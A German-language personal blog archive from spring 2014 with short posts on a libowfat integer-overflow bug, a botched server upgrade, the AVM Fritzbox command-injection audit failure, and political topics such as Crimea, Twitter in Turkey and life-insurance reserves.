Das cat schlägt fehl, weil bin nicht existiert oder ein Verzeichnis ist. grep liefert eine leere Ausgabe. Das while read hat jetzt bei meinem /bin/sh daraus eine leere Zeile gemacht. Mein /bin/sh ist "bash 4.3.8(3)-release", kompiliert mit --enable-minimal-config. Mein /bin/bash ist die gleiche Version von bash, kompiliert ohne minimal-config aber dafür mit --enable-multibyte und da geht es. Mit zsh geht es auch. Da muss man erst mal drauf kommen, dass sowas an der Shell liegen könnte. Lösung: make SHELL=/bin/bash.
[l] Habt ihr euch auch so Sorgen um die perspektivlosen Langzeitarbeitslosen von der FDP gemacht? Die armen Menschen! Haben ihr Leben lang selbstlos im Parlament anderen Menschen geholfen, z.B. den Hoteliers, und dann stehen sie jäh auf der Straße! Die armen Menschen haben ja gar nichts! Die stehen vor dem Aus! Ein furchtbares Schicksal. Man muss sich ja auch vor Augen halten, dass die sich an einen gewissen Lebensstandard gewöhnt haben!
Aber grämt euch nicht, denn zumindest Guido Westerwelle hat jetzt eine Beschäftigung gefunden. Im Kuratorium der Bertelsmann-Stiftung. Es ist gut zu sehen, dass es in diesem Land noch Stiftungen mit Herz gibt. Menschen mit Mitgefühl. (Danke, Erich)

Tue Apr 8 2014

[l] Meine Güte, was für ein Tag. Es fing damit an, dass der gatling mit openssl, den ich gestern auf dem Server selbst gebaut hatte, nicht funktionierte. Ich hatte an den Bauteilen kürzlich ein paar Veränderungen vorgenommen, aber zuhause getestet und da ging es. Unterschied: gcc 4.8.0 und 4.8.2. Also wollte ich auf dem Server mal gcc updaten, dann auch gleich mit x32-Support. Dafür fehlte aber die glibc, und eigentlich könnte ich ja auch gleich mal die glibc updaten, entschloss ich mich. Das zerschoss dann aber den ld.so, weil das ranzige Debian, das das auf dem Server mal war, /lib und /lib64 per Symlink auf das gleiche Verzeichnis zeigen lässt. Daraufhin ging sudo nicht mehr.
Naja, kein Problem, dachte ich mir, für sowas gibt es ja eine Rescue-Umgebung. Wollte die klicken — der Knopf fehlte im Webinterface. Nanu? Ticket aufgemacht. Knopf da. Knopf gedrückt — Server platt, kein Rescue kommt hoch. Ticket aufgemacht. Pause. Antwort: Wir haben da mal ne Intel e100 NIC eingebaut, damit das Rescue hochkommt, und die Onboard-NIC ausgemacht. Musst du dann in deinem Debian fixen.
Die Meldung sah ich aber erst, nachdem ich mein Problem gefixt hatte, und umgebootet hatte, und da kam dann das System zwar hoch, aber ohne Netzwerk.
Also zurück ins Rescue, aber das kam dann auch nicht mehr hoch. Ticket aufgemacht. Die haben irgendwas gebastelt, damit kam das wieder hoch.
Oh, erwähnte ich, dass das Rescue-System ohne mdadm kam? Ich hab seit gefühlt 10 Jahren kein Rescue-System mehr gebraucht. Stellt sich raus, dass sowas heutzutage ein richtiges Debian ist, wo man konfigurieren kann, inklusive apt-get install mdadm. Allerdings will er dafür über 50 MB nachladen, also hab ich lieber ein statisches dietlibc-mdadm hochgeladen und benutzt.
Das Problem, so stellte sich raus, war: Die e100-Netzwerkkarte möchte gerne Firmware nachladen, die nicht da war. Ich trag also das Repository ein und rufe apt-get auf … da baut irgendein Debian-Automatismus eine initrd neu und die ist nicht mehr bootfähig.
Nun hat mir der Hoster freundlicherweise ein KVM zur Verfügung gestellt, sonst hätte ich den Aspekt gar nicht sehen können. Aber mit der neuen initrd fand der Kernel sein root-fd nicht und panicte.
Die nächsten Schritte waren: Debian dist-upgrade (das war noch ein squeeze), grub erneuern, grub stirbt mit symbol grub_divmod64_full not found. Bekanntes Problem, offenbar, aber die Lösungen funktionierten alle nicht. purge, reinstall, deinstall, config fummel, reinstall, auf die zweite platte auch installieren, half alles nichts.
In der Mitte hatte ich noch versucht, einen eigenen Kernel zu bauen, der auf der Hardware laufen würde, aber der tat es nicht und auf dem 80x25-Screen der KVM sah ich dann auch nur die letzten statischen Zeilen eines generischen Panic-Stackdumps und konnte nicht hochscrollen. Aus irgendeinem Grund kamen Tastatureingaben nicht an über die KVM. Ich tippe auf ein Java-Problem, aber am Ende — who cares.
Der einzige Ausweg war am Ende, dass ich einen eigenen grub 2.02 beta 2 aus den Sourcen kompiliert habe. Der warf zwar auch noch lustige Fehlermeldungen, aber hat dann am Ende den Kernel doch gebootet.
So, jetzt hab ich zwar immer noch einen veralteten gcc und eine veraltete glibc, aber immerhin ist die Kiste wieder oben. Seufz.
Update: Warum war da so ein antikes Debian? Weil alle von außen erreichbaren Dienste eh von mir und nicht von Debian sind.
Update: Es gibt einen xkcd dazu! Großartig, den kannte ich noch gar nicht :-)
Update: Das SSL-Zertifikat ist dann auch mal neu, wegen des OpenSSL-Bugs gerade.
[l] Dass so ein OpenSSL-Update aber auch ausgerechnet dann kommen muss, wenn ich gerade größere experimentelle Umbauten an dietlibc und libowfat gemacht habe, und der neu gelinkte gatling dann rumzickt. Hoffentlich bleibt der jetzt oben.
Es hat halt Vor- und Nachteile, wenn man seine eigenen Prereleases in die Produktion nimmt :-)

Sun Apr 6 2014

[l] Der BGH hat entschieden, dass man den Versicherungsschutz verliert, wenn man bei Vertragsabschluss lügt. Soweit, so klar. Allerdings:
Die Aussage, er habe gegenüber dem Versicherungsmakler doch wahrheitsgemäße Angaben gemacht, half ebenfalls nicht: Das möglicherweise argliste Verhalten des Maklers geht nämlich ebenfalls zu Lasten des Versicherten, da dieser den ausgefüllten Antrag unterschreibt und damit die Richtigkeit der Angaben bestätigt.
Und kennt jemand eine vertrauenswürdigere Menschengruppe als Versicherungsmakler? Mal abgesehen von Politikern jetzt.

Thu Apr 3 2014

[l] Die Bullies haben gewonnen. Der homophobe Mozilla-Chef ist zurückgetreten. Na da können wir ja alle stolz auf uns sein. Ein Leuchtturm von Toleranz und Zivilisation und liberalen Werten. Hier ist übrigens ein Bericht einer lesbischen Mozilla-Mitarbeiterin, wie da die Arbeitsbedingungen unter Eich so waren. Hint: toleranter und lebensbejahender und stärker pro-LGBT als praktisch überall anderswo, selbst nach den Maßstäben des Silicon Valley.
Aus meiner Sicht hat dieser Heugabel-Mob für die LGBT-Community mehr kaputtgemacht als zehn Brendan Eichs es je gekonnt hätten.
Vielleicht ist das eine Mentalitätsfrage, aber man will doch die Leute inhaltlich überzeugen und nicht mit der Furcht vor solchen Übergriffen als Drohung zum Duckmäusern bringen. Also würde ich zumindest wollen. Sobald man anfängt, den Gegenüber so zu entmenschlichen, und auch noch öffentlich, begibt man sich auf ganz dünnes Eis.

Wed Apr 2 2014

[l] Die "Intelligence Community" hat einen Feldversuch gemacht. Sie haben 3000 Passanten genommen, die keinen Zugang zu irgendwelchen geheimen Daten haben, und haben sie nach ihren Einschätzungen zu Dingen wie "wird Nordkorea bis zum 10. Mai 2014 eine mehrstufige Rakete abschießen" gefragt. Dann haben sie das notiert und intern mit den Vorhersagen der hochbezahlten CIA-Spezialisten verglichen. Ergebnis:
According to one report, the predictions made by the Good Judgment Project are often better even than intelligence analysts with access to classified information, and many of the people involved in the project have been astonished by its success at making accurate predictions.
Der Eindruck drängt sich ja von außen schon länger auf, dass deren Einschätzungen zur Gesamtsituation häufig einen deutlichen Abstand zur Realität haben. Ich sage nur "Missile Gap".
[l] Kennt ihr den Film "Fog of War"? Ich hab hier schon 2006 dazu aufgerufen, den anzugucken, und wiederhole diese Empfehlung heute nochmal. Einer der wichtigsten Filme dieses Jahrtausends bisher.
Der Regisseur von Fog of War, Errol Morris, hat jetzt eine neue Dokumentation in dem Stil gemacht, diesmal mit Donald Rumsfeld. Der Name des Films ist "The Unknown Known", in Anlehnung an Rumsfelds berühmten Spruch.
Eines der Highlights des Films ist schon jetzt bekannt: Rumsfeld sagt darin, er habe ja nie sagen oder auch nur andeuten wollen, dass Saddam an 9/11 Schuld gehabt habe. Der Film kommt in den USA in ein paar Tagen raus und wird dann hoffentlich nicht lange auf sich warten lassen in Europa.
Morris hat eine wunderschöne Art, seine Interviewpartner ohne großen Druck sich um Kopf und Kragen reden zu lassen. Ich freue mich schon sehr auf diesen Film.

Sat Mar 29 2014

[l] SSL auf mobilen Endgeräten ist im Allgemeinen eine noch tragischere Story als auf Desktops. Da wird einmal alles falsch gemacht. So gut wie niemand validiert Zertifikate, wenn dann nicht ordentlich, Schlüssellängen sind unnötig kurz, schwache Cipher und Hashes überall und man kann sie teilweise auch gar nicht abschalten, … ein Desaster. So Dinge wie Certificate Pinning gehen dann gleich mal gar nicht mit den mitgelieferten SSL-Implementationen, dafür muss man sein eigenes SSL mitbringen. Und so weiter.
Um so erstaunlicher: Die US-Handelsaufsicht FTC hat jetzt ein paar Mobile-App-Klitschen verdonnert, sich 20 Jahre lang jährlich unabhängig die Security testen zu lassen.
Das wird hoffentlich wie ein Donnerhall durch die Branche krachen. Noch schöner wäre es gewesen, wenn da mal eine handfeste Strafzahlung ausgeteilt worden wäre, oder gar direkt Knastdrohung für das Management. Fandango, die eine der betroffenen Apps, verkauft Kinokarten, d.h. da gehen Kreditkartendaten über das Netz.
Update: Alle zwei Jahre nur, nicht jährlich :-(

Fri Mar 21 2014

[l] Die Türkei hat Twitter abgeschaltet, und die Presse ist sich einig: Der Faschist Erdogan macht zu seinem Machterhalt das Internet kaputt.
Tatsächlich lief das ein bisschen anders. Erdogan hatte einen Vorwand. Er hätte das wahrscheinlich auch einfach so gemacht, und dann wäre die Kritik in vollem Umfang gerechtfertigt gewesen.
Bürger haben sich beschwert, weil auf Twitter Gesetze gebrochen wurden. Beleidigungen, Privatsphäreverletzungen, Datenschutzverletzungen, sowas. Erdogan hat natürlich gleich das ganz große Fass aufgemacht und was von Staatsgeheimnissen gefaselt. Aber der Punkt ist, dass Bürger sich beschwert haben, die Polizei und zuständigen Behörden haben das dann bis ins zuständige Ministerium eskaliert, und dieses Ministerium hat dann offiziell Twitter kontaktiert — und Twitter hat das ausgesessen. In der Türkei war dann auch ein Gericht mit der Sache befasst, und das hat sich die Situation angeguckt und gesagt: Um hier die Rechte der Bürger zu wahren, bleibt uns ja nur noch eine Möglichkeit. Abschalten.
Erdogan ist natürlich sofort auf den Zug aufgesprungen und hat das als Beweis für seine Manneskraft gefeiert. Aber das hat sich Twitter im Wesentlichen selber zuzuschreiben, was jetzt hier passiert ist.
Update: Quelle.
Update: Übrigens halte ich es durchaus für denkbar, dass Twitter das absichtlich gemacht hat, damit ihr überflüssiger Fail-Whale-Ranzdienst mal wieder in der Presse als Retter der Demokratie und freien Meinungsäußerung gefeiert wird, oder als Instrument zur Revolutionsherbeiführung in Diktaturen.

Fri Mar 14 2014

[l] Weil ich hier gerne und häufig über andere Leute meckere, wenn sie vermeidbare Fehler machen: Natürlich mache auch ich Fehler. Im Moment arbeite ich an einer größeren Aufräumaktion in libowfat und habe dabei schon einige Fehler gefunden. Ich will hier mal einen posten. Es geht um die Funktion scan_ushort. Hier ist der Code vom letzten Checkin aus dem Jahre 2006:
```
size_t scan_ushort(const char* src,unsigned short* dest) {
  if (sizeof(unsigned short) == sizeof(unsigned int)) {
    /* a good optimizing compiler should remove the else clause when not
     * needed */
    return scan_uint(src,(unsigned int*)dest);
  } else {
    register const char *tmp=src;
    register unsigned short int l=0;
    register unsigned char c;
    while ((c=*tmp-'0')<10) {
      unsigned short int n;
      /* division is very slow on most architectures */
      n=l<<3; if ((n>>3)!=l) break;
      if (n+(l<<1) < n) break;
      n+=l<<1;
      if (n+c < n) break;
      l=n+c;
      ++tmp;
    }
    if (tmp-src) *dest=l;
    return tmp-src;
  }
}
```
Der Code nimmt eine Zeichenkette und versucht das als ASCII-Dezimalzahl zu parsen. Rückgabewert ist die Anzahl der Bytes, die gelesen wurden. Der Punkt an der Funktion ist, dass sie Integer Overflow erkennen und dann abbrechen soll. Bei scan_ushort ist auf meinem System der maximal abbildbare Wert 65535. Wenn man scan_ushort mit "65535" aufruft, soll er 5 zurückgeben und 65535 nach dest schreiben. Wenn man es mit "65536" aufruft, soll er 4 zurückgeben und 6553 nach dest schreiben.
Der Überlauf-Check sieht so aus, weil die anderen Optionen doof sind. Die offensichtliche Option wäre, dass ich einen Zwischenwert eines breiteren Integertypen nehme. Für scan_ushort würde das auch gehen, aber für scan_ulonglong nicht. Daher nehme ich die Option lieber nicht. Der zentrale Schritt ist:
```
l=l*10+(naechstes_zeichen-'0')
```
Dabei kann sowohl die Multiplikation als auch die Addition überlaufen, und beides muss geprüft werden. Option 1:
```
temp=l*10;
if (l!=temp/10) goto fail;
```
Leider sind Multiplikation und vor allem Division auf vielen verbreiteten Prozessoren sehr teuer. Option 2:
```
temp=l*8;  // *8 ist ein Linksshift um drei Bits, kostet so gut wie nichts
if (temp/8!=l) goto fail;   // /8 ist ein Rechtsshift um drei Bits, kostet auch so gut wie nichts
if (temp+(l*2) < temp) goto fail;   // l*8+l*2==l*10, l*2 ist Linksshift um 1, ist billig
```
Sieht sehr kompliziert aus, ist aber eigentlich sehr einfach. Und dann gibt es noch den finalen Schritt, dass man zu temp (im Code oben als n bezeichnet) noch die aktuelle Ziffer dazuaddiert. Das kann auch überlaufen, daher:
```
if (n+c < n) goto fail;
```
Und hier war der Bug. Dieser Test schlug nie an. Der Hintergrund sind die Integer-Promotion-Regeln in C. Die sagen, dass in arithmetischen Ausdrücken beide Seiten zu int promoted werden, wenn sie kleiner sind. Das heißt, dass n+c nicht überläuft, sondern komfortabel in dem int Platz hat.
Natürlich frage ich mich heute, wie mir dieser offensichtliche Fehler 2006 passieren konnte. Die Antwort ist, dass ich das von scan_uint kopiert hatte, und dort funktioniert der Check. Hätte ich trotzdem sehen müssen. Oder zumindest ein Unit-Test hätte es finden müssen. Aber mein Unit-Test hat nur 655350 getestet, nicht 65536.
Ich rolle das hier aus, weil immer wieder Leute irgendwo behaupten, ich hielte mich selbst für unfehlbar. Das ist natürlich völliger Bullshit. Fehler machen alle. Sogar djb. :-)
Wichtig ist, dass man dazuzulernen bereit ist, und dass man alten Code alle paar Jahre nochmal anguckt, um sowas zu finden. Es sind ja auch nicht alle "Fehler" tatsächlich Fehler. Manchmal haben sich auch die Ansprüche geändert. So hatte ich dieses "bei Overflow abbrechen" nur bei ein paar Integer-Parsern implementiert damals, weil mir das bei Hex und Oktal schlicht nicht so wichtig war. Das lasse ich mir heute nicht mehr durchgehen.
Ich erinnere mich daran, dass ich vor Jahren mal eine Mail von Florian Weimer kriegte, damals beim RUS-CERT. Das war 2002. Der meinte, dass das calloc in dietlibc unsicher sei. Wenn man da zwei große Zahlen reintut, dann kann die Multiplikation überlaufen, und dann kann calloc Erfolg zurückliefern, obwohl die Werte zu groß waren. Ich fand damals, dass das nicht meine Schuld sei, wenn die Leute das falsch aufrufen. Ich habe das widerwillig trotzdem gefixt. Heute habe ich da meine Philosophie komplett geändert. Wenn du ein Stück Code schreibst, das man falsch aufrufen kann, dann musst du das soweit sinnvoll und möglich abfangen. Der Grund ist, dass das die TCB reduziert. Wenn zehn Leute deine Funktion aufrufen, dann muss ich beim Security-Audit nur noch gucken, ob der Check in deiner Funktion sauber ist, nicht ob nicht einer deiner zehn Aufrufer Mist macht.
Update: Hier kam die Frage auf, ob ich das heute noch so schreiben würde. Nein, würde ich nicht. Seit dem habe ich ein paar Sachen ausgemessen und würde lieber n*8 als n<<3 schreiben. Auch der Trick mit dem c=*tmp-'0' (c ist unsigned, daher mappt der Fall c<'0' auf einen großen Wert und der Test auf kleiner Zehn schlägt fehl) ist überflüssig, wie ich in der Zwischenzeit gelernt habe. Das register-Schlüsselwort bringt nichts, schadet aber auch nichts. Die Variablennamen könnten länger sein, aber das würde die Lesbarkeit nicht erhöhen. Ob da jetzt "temp" oder "n" steht, spielt auch keine Rolle. l und c würde ich auch heute so benennen. tmp würde ich heute cur oder so nennen. Die Integer Overflow Checks würde ich auch heute noch so machen. Wieso habe ich mir überhaupt so viel Gedanken um die Performance gemacht? Weil jeder Cycle, den dein Code langsamer als nötig läuft, ein Argument für deine User ist, lieber was anderes zu benutzen. Und das andere ist dann weniger sorgfältig und merkt nicht, wenn eine zu große Zahl reinkommt.
Für Library-Programmierer gibt es meiner Erfahrung nach mehrere goldene Richtlinien, an die man sich dringend halten sollte.
1. Die Interfaces müssen offensichtlich sein.
2. Es muss einfacher sein, die APIs richtig zu benutzen, als sie falsch zu benutzen.
3. Die Implementation darf keine Zweifel lassen, dass "ich mach das mal schnell von Hand" keine Vorteile und nur Nachteile hat.
4. Insbesondere muss die Performance besser sein, als man das mal eben selber hingekriegt hätte.
Sonst kann man es auch gleich bleiben lassen.
[l] AVM sagt, vier Sicherheitsfirmen hätten ihren Code auditiert und den Bug nicht gesehen. Das finde ich bemerkenswert. Vorab: Ich habe mir weder den Code noch den Bug angeschaut und habe auch selber keine Fritzbox. Ich weiß auch nicht, welche vier Firmen das waren, und ob das wirklich Sicherheitsfirmen waren oder ob die "bloß" Tests gemacht haben, wie sich die Interviewaussage des AVM-Managers für mich liest. Es gibt da ja noch andere Tests, die man an so einem Produkt durchführen lässt. Sowas wie Abstrahlungs-Normen bei Elektrogeräten, und TÜV-Kram ala "wird es zu heiß".
Aber selbst wenn das nur eine Sicherheitsfirma war, ist das natürlich ein ganz übler Verkacker, nicht nur für die betroffene Firma sondern auch für die ganze Branche. Fakt ist leider einfach mal, dass der Kunde bei Sicherheitsaudits im Allgemeinen dasteht wie der Patient beim Arzt, oder der Kunde beim Klempner oder in der Autowerkstatt. Der Experte kann dem Kunden da einen vom Pferd erzählen. Der Kunde kann das gar nicht prüfen, weil er die Materie gar nicht ausreichend versteht. Ausnahmen bestätigen die Regel.
Aber mal zum konkreten Interview hier. Die Überschrift sagt: Vier Security-Buden haben auditiert. Das Interview selbst sagt aber was anderes:
Wir testen unsere Produkte nicht nur selbst, sondern auch mit vier externen Unternehmen
Da steht Test, nicht Security-Test. Wer sagt, dass das nicht sowas wie "Abstrahlung wegen CE-Siegel prüfen" oder so war. Weiter unten dann:
Diese Sicherheitsdienstleister, so Schöllhammer weiter, bekommen von AVM umfangreiche Dokumentationen
Wie, nur Dokumentation? Nicht den Code? Dann kann man auch nicht wirklich von einem Audit reden, sondern nur von einem Penetrationstest.
AVM selbst macht auch noch Fuzzing, sagen sie. Was ich über den Bug bisher gesehen habe: Es ist eine Unix-Kommandozeilen-Injection über schlecht validierte URL-Bestandteile. Das Backend ist anscheinend ein großes CGI-Binary mit LUA drin. Ich hab ja nichts gegen LUA, aber dieser Ansatz heißt eben auch, dass dieses Binary mit den maximalen Zugriffsrechten laufen muss, die man für alle Aktionen braucht, die dieses Tool ausführen muss. Das Design hätte schonmal Punktabzug geben müssen im Audit.
Dann: Nicht ordentlich validierte URL-Bestandteile sind genau die Haupt-Angriffsfläche bei Web-Anwendungen.
Wenn ich den Quellcode für eine Webanwendung habe, greppe ich als erstes nach Dingen wie system() und Logging-Funktionen (für Format-String-Bugs) und SQL-Statement-Absetz-Routinen (für SQL Injection). Das ist das erste, was man tut, noch bevor man sich ein Kaltgetränk holt. Es ist aus meiner Sicht nicht glaubwürdig, dass ein Audit nicht findet, wenn URL-Bestandteile in system() landen, ob gefiltert oder nicht. Daher glaube ich, dass hier kein Audit stattfand sondern nur ein Penetrationstest ohne Quellcodezugriff.
Wenn man einen Penetrationstest macht, ist das erste, was man tut, dass man einmal alle URLs kartografiert, die in der Oberfläche so vorkommen. Dafür gibt es Tools. Dann geht man die alle durch und tut jeweils Sonderzeichen rein oder übergibt besonders lange Strings. Das ist, was ein Penetrationstest tut. Im Fall der Fritzbox sind die BIOS-Images öffentlich, d.h. man kann beim Kartografieren die Liste der Skripte sehen. Das senkt die Wahrscheinlichkeit dafür, dass man ein Skript übersieht.
Was ich sagen will: Selbst wenn die keinen richtigen Audit hatten sondern nur einen Pentest, selbst dann hätte dieser Bug gefunden werden müssen. Da gibt es keine Ausrede.
AVM sagt, dass sie Fuzzing machen. Der Kontext scheint zu sein, dass sie da ihre VOIP-Protokolle gefuzzt haben. Aber anscheinend nicht ihre Web-Oberfläche, denn Fuzzing der Weboberfläche hätte diesen Bug auch gefunden.
Ich kann mir das also nur so erklären, dass entweder gar keine Security-Tests stattgefunden haben, sondern nur Funktionalitätstests, oder dass der Dienstleister viel zu wenig Zeit gekriegt hat (das kommt leider häufig vor in der Praxis, dass da unter starkem Zeitdruck operiert wird, weil so ein Audit ja auch signifikant Geld kostet), oder dass da schlicht der/die Dienstleister überfordert war. Der Bug sieht für mich jedenfalls nicht wie die Art von Bug aus, bei denen man halt mit den Schultern zuckt und Shit Happens sagt. Dieser Bug war vermeidbar.
Bei allem Bashing über die AVM-Prozesse muss man aber auch anerkennen, dass die vorbildlich reagiert haben. Hoffentlich machen sie jetzt auch einen Anlauf und suchen nach den anderen Bugs, die vermeidbar gewesen wären :-)
Update: Oh, eine Sache noch. Wie gesagt ohne jeden Einblick in diesen speziellen Fall. Was auch passieren kann, wieso so ein Bug nicht gemeldet wird: Wenn man beim Audit SO VIELE BUGS findet, dass man die gesamte verfügbare Zeit damit beschäftigt ist, die bereits gefundenen Bugs zu Protokoll zu geben, dann fällt hinten auch was runter. Das kommt gelegentlich vor. An der Stelle kann man dann dem Sicherheits-Dienstleiter keinen Vorwurf machen.
Ich behaupte auch nicht, dass dieser Bug aus irgendeinem automatisierten Tool hätte rausfallen müssen. Aber ich behaupte, dass das genau die Art von Angriffsoberfläche ist, die man bei einem Penetrationstest prüft. Das ist kein Obskuro-Spezial-Unfindbar-Krypto-Heisenbug, der sich nur bei bestimmten Sternenkonstellationen und Außentemperaturverhältnissen ausnutzen lässt.

Wed Mar 12 2014

[l] Oh und wo wir gerade bei juristische Betrachtung von Abspaltungen waren: Putin so: Die Abspaltung der Ukraine von der UdSSR war auch nicht juristisch einwandfrei.
Hintergrund ist, dass die Russen damals Regeln aufgestellt hatten, die Ländern im Wesentlichen die Abspaltung erlaubten, solange die abgespalteten Republiken Mitglieder in der GUS bleiben.
Das hat die Ukraine nicht gemacht.
Die Russen sind tolle Trolle :-) (Danke, Mathias)
[l] Eine Sache noch, die gerade bei dem Krim-Spektakel ein bisschen untergeht. Es gab da schonmal einen Fall, in dem sich eine Region unabhängig gemacht hat, gegen den Willen des Landes, zu dem sie gehörte: Der Kosovo. Damals war der Westen mit dem Ergebnis hochzufrieden. Putin hat damals gewarnt, dass das ein gefährlicher Präzedenzfall ist, und dass man das mal lieber nicht machen soll. Der Westen hat das damals als "der hat bloß Angst davor, dass sich Teile von Ex-Sowjetrepubliken abspalten" interpretiert und weitergemacht.
Der Höhepunkt der Kosovo-Aktion war, dass sich der internationale Gerichtshof mit dem Fall beschäftigt hat und zu dem Ergebnis kam, dass das legal war.
Auf dieses Gutachten stützt sich Russland jetzt. Und mal abgesehen von der Tatsache, dass die USA den Internationalen Gerichtshof nicht anerkennen, ist die Legalität einer Krim-Abspaltung damit so offiziell wie sie nur werden kann.
Ich zitiere mal aus dem Kontext von dem IGH-Urteil:
Besonders Unabhängigkeitsbewegungen weltweit hatten auf ein entsprechendes Urteil gehofft. Allerdings hatten Fachleute erwartet, dass die Richter vermeiden würden, einen Präzedenzfall zu schaffen, der andere Minderheiten veranlassen könnte, ebenfalls ihre Unabhängigkeit zu erklären. Die eindeutige Stellungnahme zugunsten des Kosovo ist deshalb eine Überraschung.
Update: Gegenposition.

Tue Mar 11 2014

[l] In den USA gibt es ja diverse Anti-Obdachlosen-Gesetze, mit denen Kommunen versuchen, Obdachlose wegzuekeln, ohne Obdachlosigkeit an sich zur Straftat zu machen, weil man sich ja nach außen gerne christlich und nächstenliebend gibt und das passt ja nicht. So kommt es dann dazu, dass Kommunen Suppenküchen zumachen, in der Hoffnung, dass die Obdachlosen dann lieber weggehen als zu verhungern. Oder hier in dieser Kommune in Florida haben sie verboten, auf Parkbänken zu schlafen. Nun ist der Nachweis ja schwierig, ob jemand tatsächlich geschlafen hat, und überhaupt, dann hängen die Obdachlosen da den ganzen Tag auf den Bänken herum, das ist ja auch nichts. Also haben sie auch "protracted lounging" im Park verboten.
Und dann … hat ein Obdachloser eine Familie angezeigt, die Picknick im Park gemacht hat, wegen protracted lounging. Und die Cops mussten dann ausrücken.
“She walked up to us and said, ‘Sir, I’m going to have to tell you to get up. There’s an ordinance against lying down in the park,’ ” McCormick said.
Harr harr (Danke, Sven)
[l] Wie kommt es eigentlich, dass Homöopathie zugelassen wird? Müssen Medikamente nicht vor der Marktzulassung ihre Wirksamkeit demonstrieren?
Einen Einblick in das Zulassungsverfahren gibt es gerade in der Pharmazeutischen Zeitung zu dem verdünnten Wasser der Marke Meditonsin. Hier wurde eine Studie gemacht. Die … na sagen wir mal … Studie hatte keine Vergleichsgruppe, schon gar nicht randomisiert oder doppelblind. Die haben da Patienten mit Schnupfen das Wässerchen gegeben und sie dann nach ner Woche gefragt, ob es ihnen besser geht. Nein, wirklich! Ich weiß nicht, wie es euch geht, aber ich habe keine weiteren Fragen.
Update: Nicht einfach drüber hinwegscrollen, lest euch das mal durch! Eines der Highlights ist, dass die Patienten wild irgendwelche "Begleitmedikation" nehmen durften, was auch ein Großteil der Leute machte.
Update: Zwei Arten von Zuschriften kamen rein: 1. das ist doch gar nicht homöopathisch, das tut nur so, da ist Wirkstoff drin. 2. Homöopathie muss doch gar keine Wirksamkeit nachweisen. Ist beides richtig. Dann merkt jemand an, dass es sich um eine "Anwendungsbeobachtung" geht, nicht um eine Wirksamkeitsstudie, und dass die vom Hersteller in Auftrag gegeben wurde. Das erkennt man — festhalten! — daran, dass da "Originalia" dransteht. Für Ärzte sei damit klar, dass es sich um PR handelt und nicht um eine ernstzunehmende Studie. (Danke, Jan)

Mon Mar 10 2014

[l] Old and busted: Bankenrettung.
New hotness: Lebensversichererrettung. Weil, äh, die nicht genug Gewinn machen, finden sie jedenfalls selbst. Das muss wie damals bei den Hoteliers sein. Außer dass die FDP nichts mehr zu sagen hat. Da musste dann halt die CDU einspringen.
Die Details sind schnell erklärt. Es geht darum, dass Versicherten zusteht, dass sie an den Bewertungsreserven beteiligt werden. Versicherte geben Versicherungen Geld, die zahlen damit die Provisionen für die Drückerkolonnen ab und ihren Wasserkopf und kaufen dann mit dem Rest Aktien und andere Wertpapiere. Die Bewertungsreserve sind die Kursgewinne, die diese Wertpapiere gemacht haben, seit deine Versicherungspolice läuft. Die Versicherungen müssen ihre Kunden überhaupt erst seit 2008 daran beteiligen und heulen jetzt herum, dass das ja nur auf dem Papier besteht, dieser Gewinn (weil sie die Wertpapiere ja weiter halten und nicht verkaufen wollen). Warum wollen sie die Wertpapiere weiter halten und nicht verkaufen? Weil die Zinsen gerade so niedrig sind. Versicherungen legen zum Großteil in festverzinslichen Papieren wie Staatsanleihen an. Da bekam man mal deutlich mehr Zinsen für als jetzt. Wenn die Versicherungen die 62 Milliarden Euro an Bewertungsreserven an ihre Kunden weitergeben sollen, anstatt davon Koks und Nutten zu kaufen, dann müssten sie ja die schönen hochverzinsten Papiere verkaufen und beim nächsten reinkommenden Kunden dann jetzt unattraktive niedrig verzinste Papiere kaufen. So deren Argumentation.
Die Frage ist, mit welchem Recht die Versicherungen darum herum kommen wollen, ihren Kunden das mit deren Geld erwirtschaftete Vermögen auszuzahlen. Ich zitiere mal die Argumentation an der Stelle:
Die Gesellschaften legen langfristig an und haben deshalb viele Anleihen mit vergleichsweise hohen Zinsen im Bestand, die sie vor fünf bis zwölf Jahren gekauft haben und die heute - wegen der aktuell niedrigen Zinsen - deutlich mehr wert sind. Die Versicherer argumentieren, die Auszahlung der Hälfte der Reserven an ausscheidende Kunden sei ungerecht, weil die verbleibenden mit weniger Rendite auskommen müssten - diesem Argument schließt sich die Regierung an.
Hier wird impliziert, dass die eingenommene Kohle vom Vertrag von Kunde A dann Kunde B zugute kommt. Das ist aber natürlich nicht so. Die Versicherungen würden das lieber als Profit ausweisen und an ihre Aktionäre ausschütten, oder für Werbung ausgeben. Genau das soll das neue Gesetz jetzt verbieten.
Ich würde mich wundern, wenn das auch so im Gesetz landen würde am Ende. Wir haben es hier schließlich mit bösartig (CDU) und inkompetent (SPD) zu tun.

Sun Mar 9 2014

[l] Wieso sind die Amerikaner eigentlich so unter Druck bezüglich der Ukraine? Ob man jetzt Putin jetzt ärgert oder in sechs Monaten, wieso ist das so wichtig für die Amis? Und selbst wenn die Ukraine unter russischer Kontrolle geblieben wäre, na und, die Amis haben doch schon alle anderen Länder in der Gegend an die Nato angeschlossen. Wieso drängelt das jetzt so, dass sie der Ukraine dieses bekloppte Ultimatum reindrücken mussten?
Hier ist ein Erklärungsversuch: Ende letzten Jahres hat Chevron einen 10-Milliarden-Deal mit der Ukraine gemacht. Dabei geht es um die Förderung von Schiefergas. Einen ähnlichen Deal hat Royal Dutch Shell unterschrieben. Das könnte erklären, wieso die EU mitgedrängelt hat.
Schiefergas wird mit Fracking gewonnen. Wenn man auf den Umweltschutz scheißt, ist Fracking auf dem Papier auch echt super — Europa zahlt an die Russen mehr als das Doppelte dessen für Erdgas was die Amis für ihr per Fracking gefördertes blechen. Die Ukraine kriegt zwar von den Russen 33% Rabatt, aber liegt damit immer noch über 50% über dem, was die Amis für ihr Fracking-Gas zahlen.
Die Russen haben schon die zweitgrößte Ölraffinerie der Ukraine gekauft, und arbeiten gerade an der Übernahme der größten.
Das Erdgas, das Europa bei den Russen kauft, geht übrigens zu einem signifikanten Teil durch die Ukraine, die sich da historisch gesehen immer gerne mal ein bisschen auf dem Weg abgezwackt hat. Ein Spielchen, das auch die anderen Länder auf dem Weg spielen, insbesondere Weißrussland und Polen. Daher hat Russland ja die Pipeline durch die Ostsee gebaut und zur Chefsache von Ex-Kanzler Schröder gemacht.
So und jetzt gucken wir uns mal die Karte mit den Erdgasvorkommen in der Ukraine an. Wie ihr sehen könnt, gibt es zwei große Vorkommen, und das größere ist am östlichen Rand. Das ist zufällig (nach der Krim) auch der Teil der Ukraine mit dem größten Anteil an russischsprachigen Einwohnern.
